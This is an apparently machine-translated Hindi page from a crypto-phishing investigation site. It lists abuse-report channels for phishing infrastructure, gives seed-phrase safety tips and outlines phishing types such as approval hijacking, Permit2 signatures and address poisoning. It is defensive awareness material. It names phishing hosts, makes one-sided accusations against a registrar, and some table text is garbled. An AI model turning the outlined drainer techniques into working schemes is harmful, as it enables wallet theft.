ट्विटर/एक्सविज्ञापन खाता साइट #4 का प्रचार कर रहा हैX विज्ञापनों दुरुपयोग रिपोर्ट
फ़ॉर्म सबमिट डॉट कॉहैश a2cf4131... (#7)फ़ॉर्म सबमिट दुरुपयोग फ़ॉर्म
रिप्लिटलेजर-रिकवरी.सपोर्ट (#6)रिप्लिट दुरुपयोग रिपोर्ट
नाम.कॉम[REDACTED]-recovery.support के लिए रजिस्टर करें[REDACTED] दुरुपयोग
डीएनएसएक्जिटदयालुजिग्गा4रियल123.पब्लिकवीएम.कॉम[REDACTED] दुरुपयोग
फ़ॉन्टावesomeकिट bdc3291137 (#7)फ़ॉन्टावesome दुरुपयोग
चेनअभ्यूससभी फ़िशिंग अभियानचीनअत्याचार.कॉम

खुद को कैसे सुरक्षित रखें

स्वर्ण नियम

कोई भी वैध सेवा कभी भी आपसे अपनी सीड फ़्रेज़ वेबसाइट में टाइप करने के लिए नहीं कहेगी। सीड फ़्रेज़ केवल वॉलेट रिकवरी के दौरान आधिकारिक वॉलेट सॉफ़्टवेयर में ही डाले जाते हैं — कभी भी तीसरे पक्ष की "प्रमाणीकरण", "सिंक्रोनाइज़ेशन", या "रिकवरी" वेबसाइटों पर नहीं।

किसी भी वॉलेट को कनेक्ट करने से पहले:

  • यह सत्यापित करें कि URL आधिकारिक डोमेन से मेल खाता है। SSL प्रमाणपत्र का विवरण जांचें।
  • असली WalletConnect QR कोड या डीप लिंक का उपयोग करता है — कभी भी सीड फ़्रेज़ फ़ॉर्म का नहीं।
  • यदि "कनेक्शन विफल" हो जाए और आपसे मैन्युअल रूप से क्रेडेंशियल दर्ज करने के लिए कहा जाए — तो यह फ़िशिंग है।
  • संदिग्ध यूआरएल की जाँच करें फ़िशटैंक या वायरसटोटल संवाद करने से पहले।
  • हार्डवेयर वॉलेट का उपयोग करें — यह प्रत्येक लेनदेन के लिए भौतिक पुष्टि की आवश्यकता होती है।
  • आधिकारिक यूआरएल को बुकमार्क करें। विज्ञापनों, डीएम या सोशल मीडिया से आने वाले लिंक पर कभी क्लिक न करें।

क्रिप्टो फ़िशिंग वर्गीकरण

सीड फ़्रेज़ चोर केवल एक श्रेणी हैं। यहाँ क्रिप्टो फ़िशिंग का पूरा परिदृश्य है — हम प्रत्येक प्रकार में गहन विश्लेषण जोड़ेंगे।

सीड फ़्रेज़ चोर
नकली "कनेक्ट वॉलेट" पेज जो आपको अपना रिकवरी वाक्यांश टाइप करने के लिए धोखा देते हैं। इस लेख का मुख्य फोकस — 5 वास्तविक उदाहरणों का विश्लेषण।
ऊपर कवर किया गया
अनुमोदन अपहरण
दुर्भावनापूर्ण dApps जो [REDACTED] के माध्यम से असीमित टोकन अनुमोदन मांगते हैं। एक बार अनुमोदन मिल जाने पर, हमलावर आपके सीड फ्रेज की आवश्यकता के बिना आपके वॉलेट को खाली कर देता है।
जल्द आ रहा है
आइस फिशिंग (परमिट2)
EIP-2612 गैसलेस परमिट्स का शोषण। पीड़ित एक ऑफ-चेन संदेश पर हस्ताक्षर करता है जो टोकन स्थानांतरण अधिकार प्रदान करता है — ड्रेन तक कोई ऑन-चेन अनुमोदन दिखाई नहीं देता।
जल्द आ रहा है
नकली एयरड्रॉप दावे
दुर्भावनापूर्ण स्मार्ट कॉन्ट्रैक्ट के माध्यम से "दावा" करने की आवश्यकता वाले नकली टोकन एयरड्रॉप्स। दावा लेनदेन वास्तव में आपके असली टोकन बाहर भेज देता है।
जल्द आ रहा है
क्लिपबोर्ड हाईजैकर्स
एक मैलवेयर जो आपके क्लिपबोर्ड की निगरानी करता है और पेस्ट करने से पहले चुपचाप कॉपी किए गए वॉलेट पतों को हमलावर के पते से बदल देता है।
जल्द आ रहा है
धूल हटाना + विषाक्त करना
एक जैसे दिखने वाले पतों से होने वाले छोटे-छोटे लेनदेन आपके इतिहास को दूषित करते हैं। पीड़ित अपने अगले ट्रांसफर के लिए लेनदेन इतिहास से नकली पता कॉपी कर लेता है।
जल्द आ रहा है

असहज सत्य

क्रिप्टो फ़िशिंग ऑपरेशन स्थापित करने की लागत $0 और लेता है 30 मिनट से कम. मुफ्त होस्टिंग, मुफ्त फॉर्म सेवाएँ, मुफ्त मैसेजिंग बॉट्स। साइट #1 के पीछे का हमलावर पहले ही से क्रेडेंशियल्स इकट्ठा कर चुका है १,८२४+ पीड़ित. साइट #4 चल रही है भुगतान विज्ञापन मापने के लिए। यह शौकिया समय नहीं है — यह एक उद्योग है। एकमात्र रक्षा जागरूकता है।

हमारी लड़ाई में हमारा साथ दें

THE ENABLERS REGISTRY क्रिप्टो फ़िशिंग साइटों को रीयल-टाइम में ट्रैक और रिपोर्ट करता है। यदि आप किसी संदिग्ध साइट का सामना करते हैं, तो हमें रिपोर्ट करें — हम इसकी जांच करेंगे और उसे बंद कराने के लिए काम करेंगे।

संबंधित जांचें

जांच
[REDACTED] का अंत: नेमसाइलो ने एक बड़े चोर की रक्षा के लिए झूठ बोला
10-वर्षीय मोनेरो चोरी। 3 रजिस्ट्रारों ने कार्य किया। IANA #1479 ने 7 झूठ गढ़े।
गहन विश्लेषण
क्रिप्टो ड्रेनर नेटवर्क: बुनियादी ढांचा बेनकाब
ड्रेनर-एज़-ए-सर्विस संचालन कैसे बुनियादी ढांचे और ऑपरेटरों को साझा करते हैं।
पैनल उजागर
ट्रस्ट वॉलेट फ़िशिंग पैनल: पूर्ण एडमिन एक्सेस
हमने एक ट्रस्ट वॉलेट फ़िशिंग ऑपरेशन के एडमिन पैनल तक पहुँच प्राप्त की।
अवसंरचना
घोटाला अवसंरचना बेनकाब: साझा बैकएंड्स
धोखाधड़ी के संचालन कैसे सर्वर, टेम्पलेट और भुगतान प्रवाह साझा करते हैं।

Continue browsing the ledger

This page is the editorial mirror. Brand names are redacted to public IANA / business identifiers. Use the index to navigate other case files.

Open registrar ledger → All briefings